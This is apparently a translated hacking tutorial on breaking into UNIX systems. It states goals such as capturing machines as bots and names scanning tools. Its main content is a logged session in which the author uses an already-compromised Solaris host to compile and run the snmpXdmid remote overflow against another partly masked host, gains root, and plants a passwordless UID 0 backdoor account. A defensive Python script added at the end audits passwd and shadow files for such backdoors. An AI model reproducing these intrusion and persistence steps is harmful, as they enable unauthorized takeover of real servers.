I. Basic Knowledge
1: Common UNIX versions:
SCO Unix, SunOS, Solaris, HP-UX, Digital Unix, IRIX, AIX, Linux, FreeBSD, OpenBSD, A/UX, BSD, BSD-Lite, Coherent, Dynix, Hurd (GNU), Interactive, Mach, Minix, MKS Toolkit, NetBSD, OSF/1, System V Unix, Unicos, UnixWare...
2: A few brief introductions
SunOS & Solaris: Sun originally intended to replace SunOS with Solaris. However, at users' request, the policy of letting the two coexist has been kept to this day;
FreeBSD is one of the successors of the famous BSD UNIX. It is quite stable among the many UNIX branches, and many ISPs run FreeBSD;
Linux is a free and cheap UNIX product for PC users (its hardware platform is the Intel series of CPUs). In fact, many network administrators use Linux.
3: UNIX operating system features
(1) multi-user and multi-tasking; (2) portability; (3) tree-structured file system; (4) I/O redirection and pipes; (5) rich utilities; (6) each user has a mailbox.
4: Highlights
(1) high stability and reliability; (2) strong networking functions; (3) good openness; (4) powerful database support; (5) high scalability.
II. Purpose of Intrusion
1: To learn UNIX, become familiar with how it works internally, and with its complete configuration...
2: To use the machine as a stepping stone, or to capture more UNIX machines as bots;
3: To gain unauthorized access to something that is not available through normal requests;
4: To attack other systems, or to use the machine as a tool to damage them;
5: and more......
III. Intrusion Methods
1: Find the target
Tools: SuperScan, Fluxay, LANguard Network Scanner 2.0, or others, depending on your preference
SuperScan: port scanning. Note the hosts whose banners contain %, #, &...; these are UNIX;
LANguard: a few simple settings and you can start; its operating-system identification is excellent and among the most accurate of similar tools;
Fluxay: use advanced scanning and select Telnet, RPC, POP3, FTP and Finger.
Other tools work much the same way...
(Note: many administrators deliberately change the banner displayed at telnet login to confuse intruders)
2: Start intrusion
(1) Overflow (all UNIX overflow exploits need to be compiled in a UNIX/Linux environment)
A: Remote Overflow
Overflows? There are too many! To name a few: the FreeBSD remote overflow, the BIND remote overflow, the Sun Solaris 5.7/5.8 remote overflow, the Red Hat 6.x rpc.statd remote overflow... There is no way to go through them one by one, so here I will give two simple examples:
A1: Since many friends use Windows, you can read my brother Blue Knight's masterpiece "FreeBSD overflow, full text version" (address: http://www.itser.com/ez/.bbs/topic.cgi?forum=7&topic=25&show=), because that overflow program has already been compiled and can be used directly under Windows;
A2: Remote Overflow of Sun Solaris 5.7
Searching... finally I found a SunOS 5.7 and a SunOS 5.8
telnet 66.*.146.48 -----> this one is mine!
SunOS 5.8
login: ply
Password:
Last login: Tue Apr 23 03:55:09 from 39448.ddn.xaonli
Sun Microsystems Inc.   SunOS 5.8       Generic February 2000
$ /tmp/.sh -----> left over from the overflow back then!
# ls
bin   data  etc   initrd  mnt   proc  sbin  usr
boot  dev   home  lib     misc  opt   root  tmp   var
xfn   (rest omitted)
# cat > snmp.c
... -----> too long, omitted... find it yourself!
# gcc -o snmp snmp.c -----> compile with gcc
snmp.c: In function 'main':
snmp.c:181: warning: passing arg 3 of pointer to function from incompatible pointer type
snmp.c:181: warning: passing arg 4 of pointer to function from incompatible pointer type
snmp.c:181: warning: passing arg 5 of pointer to function from incompatible pointer type
# ls
bin   data  etc   initrd  mnt   proc  sbin  snmp    usr
boot  dev   home  lib     misc  opt   root  snmp.c  tmp   var
# ./snmp
copyright LAST STAGE OF DELIRIUM mar 2001 poland  //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8
usage: ./s address [-p port] -v 7|8
# ./snmp 216.*.45.63 -v 7 ----> start the overflow!!
copyright LAST STAGE OF DELIRIUM mar 2001 poland  //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u sparc SUNW,Ultra-80
id
uid=0(root) gid=0(root) -----> root!
echo "ply:0:0://bin/bash" > /etc/passwd -----> add a user first!
echo "ply::::::::::" >> /etc/shadow
... -----> carry on with whatever else you want to do!
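The two echo lines above leave behind exactly what an administrator reviewing such a box should look for: a second UID 0 entry in /etc/passwd and an /etc/shadow entry whose password field is empty. As an added example that is not part of the original article, the Python below audits passwd- and shadow-format text for those two conditions, and also flags entries with the wrong number of fields; the sample file contents are constructed, not taken from any real host.

```python
# Added defender-side audit (not from the original article): flag a second
# UID 0 account, an unshadowed password field, an empty shadow password,
# and malformed entries. Sample file contents below are constructed.

PASSWD_FIELDS = 7   # name:passwd:uid:gid:gecos:home:shell
SHADOW_FIELDS = 9   # name:hash:lastchg:min:max:warn:inactive:expire:flag

PASSWD_SAMPLE = """root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
ply:x:100:1:ply:/export/home/ply:/bin/sh
ply:x:0:0::/:/bin/sh
ply:0:0://bin/bash
"""

SHADOW_SAMPLE = """root:$5$salt$constructedhash:6445::::::
daemon:NP:6445::::::
ply:$5$salt$constructedhash2:6445::::::
ply::::::::::
"""

def _entries(text):
    """Yield (line_no, fields) for each non-blank colon-separated line."""
    for no, line in enumerate(text.splitlines(), 1):
        if line.strip():
            yield no, line.split(":")

def audit_passwd(text):
    """Return (line_no, user, reason) findings for passwd-format content."""
    findings = []
    for no, f in _entries(text):
        user = f[0]
        if len(f) != PASSWD_FIELDS:
            findings.append((no, user, "malformed entry: %d fields" % len(f)))
        if len(f) > 2 and f[2] == "0" and user != "root":
            findings.append((no, user, "extra UID 0 account"))
        if len(f) > 1 and f[1] != "x":
            findings.append((no, user, "password field is not 'x' (not shadowed)"))
    return findings

def audit_shadow(text):
    """Return (line_no, user, reason) findings for shadow-format content."""
    findings = []
    for no, f in _entries(text):
        user = f[0]
        if len(f) != SHADOW_FIELDS:
            findings.append((no, user, "malformed entry: %d fields" % len(f)))
        if len(f) > 1 and f[1] == "":
            findings.append((no, user, "empty password field: login needs no password"))
    return findings
```

On a live system, feed it the real files: audit_passwd(open("/etc/passwd").read()) and, as root, audit_shadow(open("/etc/shadow").read()).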